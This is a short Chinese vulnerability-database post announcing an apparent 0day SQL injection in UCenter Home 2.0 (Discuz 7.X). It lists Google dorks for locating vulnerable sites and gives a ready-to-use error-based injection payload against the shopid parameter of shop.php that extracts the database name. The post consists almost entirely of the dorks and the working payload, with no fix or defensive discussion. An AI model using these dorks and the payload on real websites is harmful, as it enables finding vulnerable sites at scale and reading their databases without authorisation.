Discuz7.X通杀0day(UCenter Home-2.0)

  • 发表于
  • Vulndb

Dork : Powered by UCenter inurl:shop.php?ac=view
Dork 2 : inurl:shop.php?ac=view&shopid=
Vuln file : Shop.php
===================================================================
利用POC

shop.php?ac=view&shopid=4 and (select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1